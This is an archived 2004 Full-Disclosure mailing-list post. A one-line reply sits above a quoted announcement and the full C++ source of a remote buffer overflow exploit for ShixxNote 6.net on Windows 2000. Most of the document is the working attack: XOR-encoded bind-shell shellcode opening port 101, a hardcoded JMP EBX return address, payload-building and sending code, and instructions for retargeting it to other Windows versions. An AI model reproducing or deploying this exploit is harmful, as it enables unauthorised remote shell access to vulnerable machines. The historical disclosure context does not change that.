|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: [Full-Disclosure] Windows 2000 Remote Buffer Overflow by class101
From: kf_lists (kf_lists
secnetops.com)
Date: Fri Oct 22 2004 - 19:04:12 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
What listens on port 2000?
-KF
sk3tchsk3tch.net wrote:
>Posted here:
>
>http://dfind.kd-team.com/36/55/op.php
>
>"Stack based overflow, bug discovered by Luigi Auriemma
>aluigi.altervista.org
>Tested working on Win2K, This public version crash on any WinXP, read
>the code why.
>The exploit bind a shellcode on the victim port 101."
>
>>From the code:
>
>"Why Win2k only?
> After some days of debugging on it , I finally figured out how to
>exploit this
>hole, this public overflow method works only on Win2k, using the
>JMP EBX from comdlg32.dll from Win2k SP4 english.
>Because on WinXP , the register EBX points to a NULL address, this is
>not exploitable
>even if you update the JMP EBX, not exploitable VIA THIS WAY on XP I
>mean OK!.
>
>How do I did then on Win2k?
> I overwritte EIP with a JMP EBX, EBX is a perfect register because it
>points directly
>to my buffer, but problem, it points 4 bytes only before EIP, quite
>short...
>But enough to say him to jump ~80 bytes higher.
>Now i have enough space to adjust my shellcode to ESI and to finally
>jump to it...
>That's why on WinXP (and maybe others , havent tested) this doesnt works
>because EBX isnt
>available.
>Not happy? code yours or get a pvt version ;p
>
>How do I update to Win2k SP1 Dutch for example ?
> Grab a JMP EBX address in comdlg32.dll from this OS and update the
>code."
>
>
>
>
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
>
/*
ShixxNote 6.net buffer overflow exploit v0.1
Public exploit overflows only Win2K systems, else crashs.
Exploit code by class101 [at] DFind.kd-team.com
Bind a shellcode to the port 101.
Thanx to Luigi Auriemma(aluigialtervista.org) for the bug discovery
Thanx to HDMoore and Metasploit.com for their kickass ASM work.
Why Win2k only?
After some days of debugging on it , I finally figured out how to exploit this
hole, this public overflow method works only on Win2k, using the
JMP EBX from comdlg32.dll from Win2k SP4 english.
Because on WinXP , the register EBX points to a NULL address, this is not exploitable
even if you update the JMP EBX, not exploitable VIA THIS WAY on XP I mean OK!.
How do I did then on Win2k?
I overwritte EIP with a JMP EBX, EBX is a perfect register because it points directly
to my buffer, but problem, it points 4 bytes only before EIP, quite short...
But enough to say him to jump ~80 bytes higher.
Now i have enough space to adjust my shellcode to ESI and to finally jump to it...
That's why on WinXP (and maybe others , havent tested) this doesnt works because EBX isnt
available.
Not happy? code yours or get a pvt version ;p
How do I update to Win2k SP1 Dutch for example ?
Grab a JMP EBX address in comdlg32.dll from this OS and update the code.
Take a look at www.KD-Team.com, really nice peaces of code to find. Good job DiabloHorn ;)
Take a look at www.GovernmentSecurity.org, good public place if you ignore all lame threads ^^ and all
retarded, without to name them to not add credits to their stupidity....
Greets cp, and sorry jester ....
*/
#include "winsock2.h"
#include "fstream.h"
#pragma comment(lib, "ws2_32")
//BIND shellcode port 101, XORed 0x88, thanx HDMoore.
char scode[] =
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";
/*
//Execute regedit.exe, XORed 0x88, hardcoded Win2k SP4 English
char scode2[] = "\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\xDD\x01\x6D\x09\x64\xC4\x88\x88\x88\xDB\x05\xF5\x3C\x4E\xCD\x7C\xFA\x4E\xCD"
"\x7D\xED\x4E\xCD\x7E\xEF\x4E\xCD\x7F\xED\x4E\xCD\x70\xEC\x4E\xCD\x71\xE1\x4E\xCD"
"\x72\xFC\x4E\xCD\x73\xA6\x4E\xCD\x74\xED\x4E\xCD\x75\xF0\x4E\xCD\x76\xED\x4E\xCD"
"\x77\x88\xE0\x8D\x88\x88\x88\x05\xCD\x7C\xD8\x30\xB7\xC8\xD0\xF4\x77\x58\xE0\x89"
"\x88\x88\x88\x30\xF5\x86\xD0\xF4\x77\x58\x68\x61\x63\x6B\x90";
*/
static char payload[5000];
char jmpebxw2k[]="\x79\x3c\xb6\x76"; //JMP EBX - comdlg32.dll - Win2k SP4 English
void usage(char* us);
WSADATA wsadata;
void ver();
int main(int argc,char *argv[])
{
ver();
if ((argc<2)||(argc>3)){usage(argv[0]);return -1;}
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;}
int ip=htonl(inet_addr(argv[1])), sz, port, sizev, sizew, sizex, sizey, sizez, v, w, x, y, z;
if (argc==3){port=atoi(argv[2]);}
else port=2000;
SOCKET s;
struct fd_set mask;
struct timeval timeout;
struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;}
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
case 0: {cout<<"[+] connect() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
cout<<"[+] connected, constructing the payload..."<<endl;
Sleep(1000);
sizev=5;
sizew=88;
sizey=800-sizeof(scode);
sizex=5;
sizez=20;
sz=sizev+sizew+sizex+sizez+sizeof(scode)+sizey;
memset(payload,0,sizeof(payload));
strcat(payload,"~~");
for (v=0;v<sizev;v++){strcat(payload,"\x61");}
strcat(payload,"\x66\x8b\xf3");
strcat(payload,"\x66\x83\xc6\x09");
strcat(payload,"\xff\xe6");
for (w=0;w<sizew;w++){strcat(payload,"\x61");}
strcat(payload,"\xeb");
strcat(payload,"\x9d\x61\x61");
strcat(payload,jmpebxw2k);
for (x=0;x<sizex;x++){strcat(payload,"\x90");}
strcat(payload,scode);
for (y=0;y<sizey;y++){strcat(payload,"\x61");}
for (z=0;z<sizez;z++){strcat(payload,"~");}
if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;}
cout<<"[+] size of payload: "<<sz<<endl;
cout<<"[+] payload send, connect the port 101 to get a shell."<<endl;
return 0;
}
}
closesocket(s);
WSACleanup();
return 0;
}
void usage(char* us)
{
cout<<"USAGE: 101_shixx.exe Ip Port\n"<<endl;
cout<<"NOTE: "<<endl;
cout<<" The port 2000 is default if no port specified."<<endl;
cout<<" The exploit bind a shellcode to the port 101."<<endl;
cout<<" Public version - Win2k systems only"<<endl;
cout<<" Update the JMP address for another SP/Language"<<endl;
return;
}
void ver()
{
cout<<endl;
cout<<" "<<endl;
cout<<" ===================================================[v0.1]===="<<endl;
cout<<" =======ShixxNote 6.net, Remote Buffer Overflow Exploit======="<<endl;
cout<<" =====coded by class101===========[DFind.kd-team.com 2004]===="<<endl;
cout<<" ============================================================="<<endl;
cout<<" "<<endl;
}
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]